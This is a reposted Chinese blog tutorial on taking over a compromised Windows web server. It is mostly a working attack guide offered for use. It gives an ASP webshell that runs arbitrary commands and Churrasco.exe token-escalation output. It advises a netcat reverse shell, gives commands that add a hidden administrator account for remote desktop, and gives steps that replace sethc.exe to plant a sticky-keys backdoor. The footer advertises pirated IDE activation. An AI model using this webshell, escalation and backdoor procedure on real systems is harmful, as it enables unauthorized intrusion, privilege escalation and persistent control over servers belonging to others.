1. 全栈程序员必看首页

启用shift后门的方法_服务器可以拿来干什么

全栈程序员-站长 未分类 阅读 4

启用shift后门的方法_服务器可以拿来干什么提权工具如下:cmd.exeChurrasco.exenc.exe提权前提:Wscript组件成功开启如果Wscript组件被关闭,则使用以下方法开启:源代码:<objectrunat=serverid=oScriptlhnscope=pageclassid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

提权工具如下:cmd.exe Churrasco.exe nc.exe

提权前提:Wscript组件成功开启

如果Wscript组件被关闭,则使用以下方法开启:

源代码:

<object runat=server id=oScriptlhn scope=page classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>  

<%if err then%>

<object runat=server id=oScriptlhn scope=page classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>

<%

end if %>

<form method=”post”>

<input type=text name=”cmdx” size=60 value=”C:\RECYCLER\cmd.exe”><br>

<input type=text name=”cmd” size=60><br>

<input type=submit value=”net user”></form>

<textarea readonly cols=80 rows=20>

<%On Error Resume Next

if request(“cmdx”)=”C:\RECYCLER\cmd.exe” then

response.write oScriptlhn.exec(“cmd.exe /c”&request(“cmd”)).stdout.readall

end if

response.write oScriptlhn.exec(request(“cmdx”)&” /c”&request(“cmd”)).stdout.readall

%>

</textarea>

将源代码保存为1.asp并上传到webshell里,IE访问1.asp,如没有出错等就说明可以执行CMD命令!

下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功 但出现/churrasco/–>Current User: NETWORK SERVICE

/churrasco/–>Getting Rpcss PID …

/churrasco/–>Found Rpcss PID: 696

/churrasco/–>Searching for Rpcss threads …

/churrasco/–>Found Thread: 444

/churrasco/–>Thread not impersonating, looking for another thread…

/churrasco/–>Found Thread: 700

/churrasco/–>Thread not impersonating, looking for another thread…

/churrasco/–>Found Thread: 704

/churrasco/–>Thread not impersonating, looking for another thread…

/churrasco/–>Found Thread: 712

/churrasco/–>Thread impersonating, got NETWORK SERVICE Token: 0xf24

/churrasco/–>Getting SYSTEM token from Rpcss Service…

/churrasco/–>Found szywjs Token

/churrasco/–>Found SYSTEM token 0xf1c

/churrasco/–>Running command with SYSTEM Token…

 

直到这里 没有出现命令执行成功 那么这时你千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了!

 

在反弹回来的CMDSHELL里执行 C:\RECYCLER\Churrasco.exe “net user iisuser iisuser /add”
  C:\RECYCLER\Churrasco.exe “net localgroup administrators iisuser /add”
  C:\RECYCLER\Churrasco.exe 这里是你所传到的目录!这样可以说90%的出现命令执行成功!这样就可以进行3389连接了!
  如果说这时没有出现命令执行成功 下面我就再告诉你一种方法!
  如下 依次执行:
  attrib c:\windows\system32\sethc.exe -h -r -s
  attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
  del c:\windows\system32\sethc.exe
  copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
  copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
  attrib c:\windows\system32\sethc.exe +h +r +s
  attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
  如果出现拒绝等错误 那就没法了!如果说这台服务器先是被别人拿过了做了shift后门 那么就是100%成功!本人亲自    用这方法成功替换过别人带有密码的SHIFT后门!
  还有一点就是在webSHELL里或CMDSHELL下也可以这样执行!
  C:\RECYCLER\Churrasco.exe “copy d:\windows\explorer.exe d:\windows\system32\sethc.exe”
  C:\RECYCLER\Churrasco.exe “copy d:\windows\system32\sethc.exe d:\windows\system32\dllcache\sethc.exe “
  还有就是attrib 加属性等也可以这样执行!还有一点忘了就是在反弹回来的CMDSHELL里用这种方法也可以!
  这样就可以利用SHIft后门成功拿下服务器了。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/192217.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • 插值法综合实例用matlab解决,matlab 插值法「建议收藏」

    插值法综合实例用matlab解决,matlab 插值法「建议收藏」

    插值法综合实例用matlab解决,matlab 插值法「建议收藏」matlab插值法实验五插值法5.1实验目的掌握插值的基本思想与方法,会借助数学软件Matlab求解并讨论其收敛性.5.2实验内容1、Lagrange插值法、Newton插值法的Matlab求解方法,在对Runge现象的观察基础上,了解高次插值的不稳定性及其改进方法;2、熟悉Matlab中的插值求解函数,掌握三次样条插值的Matlab求解;3、会求解某些简单的实际问题.5.3实验步骤5.5.1…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月5日
    126
  • C++类中静态变量和静态方法使用介绍

    C++类中静态变量和静态方法使用介绍

    C++类中静态变量和静态方法使用介绍刷剑指offer第64题涉及到类内静态成员与方法的知识,有点模糊,找了两篇博客整理一下。转自:https://www.cnblogs.com/sixue/p/3997324.html    最近一直看c++相关的项目,但总是会被c++类中的静态成员变量与静态成员函数的理解感觉很是模糊,不明白为什么类中要是用静态成员变量.于是在网上搜集了一些资料,自己再稍微总结下。静态成员的概…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月27日
    35
  • DockerCon 2016 Day2 : 企业生产环境可用 docker

    DockerCon 2016 Day2 : 企业生产环境可用

    DockerCon 2016 Day2 : 企业生产环境可用

    全栈程序员-站长的头像 全栈程序员-站长
    2021年9月16日
    51
  • jupyter notebook的链接密码 token查询 以及 pycharm 如何使用 jupyter notebook「建议收藏」

    jupyter notebook的链接密码 token查询 以及 pycharm 如何使用 jupyter notebook「建议收藏」

    jupyter notebook的链接密码 token查询 以及 pycharm 如何使用 jupyter notebook「建议收藏」目录1、token的查询:2、如何在pycharm中使用jupyternotebook学Python时突然想用jupyternotebook来运行一下代码,好做一下笔记,结果发现要jupyternotebook的token密码,这可苦了我,我怎么可能会记得呢。。。于是上百度搜索一番,有不错的收获,现整理一下:1、token的查询:结合网上查找的和我自己的体会,发现了3种…

    全栈程序员-站长的头像 全栈程序员-站长
    2025年6月18日
    4
  • Apache Struts 2入门指南

    Apache Struts 2入门指南

    Apache Struts 2入门指南ApacheStruts2入门指南作者:chszs,版权所有,未经同意,不得转载。博主主页:http://blog.csdn.net/chszs本文使用最新的Struts2.3.24.1版,演示了怎样用ApacheStruts2构建最基本的Web应用。项目的基本需求:1)Maven3.3.32)EclipseMars.1Release(4.5.1)3)Struts2.3.24

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月13日
    19
  • pycharm自己设置补全内容

    pycharm自己设置补全内容

    pycharm自己设置补全内容pycharm自己设置补全内容学习网络爬虫时,发现我们写一个代码总是要到浏览器上复制User-Agent,或者到自己之前保存好的文件里复制,当然直接能把浏览器的User-agent一个字母不拉的写出来的牛人不在此列。所以我在pycharm上自定义了一个补全模板,可以帮我快速填写User-agent,如下图:1.首先打开pycharm的–》设置,然后选择–》编辑器>活动模板2.然后点右边的‘+’添加自定义代码内容3.然后编辑这个模板说明:缩写:User-Agent这里填写的是

    全栈程序员-站长的头像 全栈程序员-站长
    2022年8月25日
    10

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号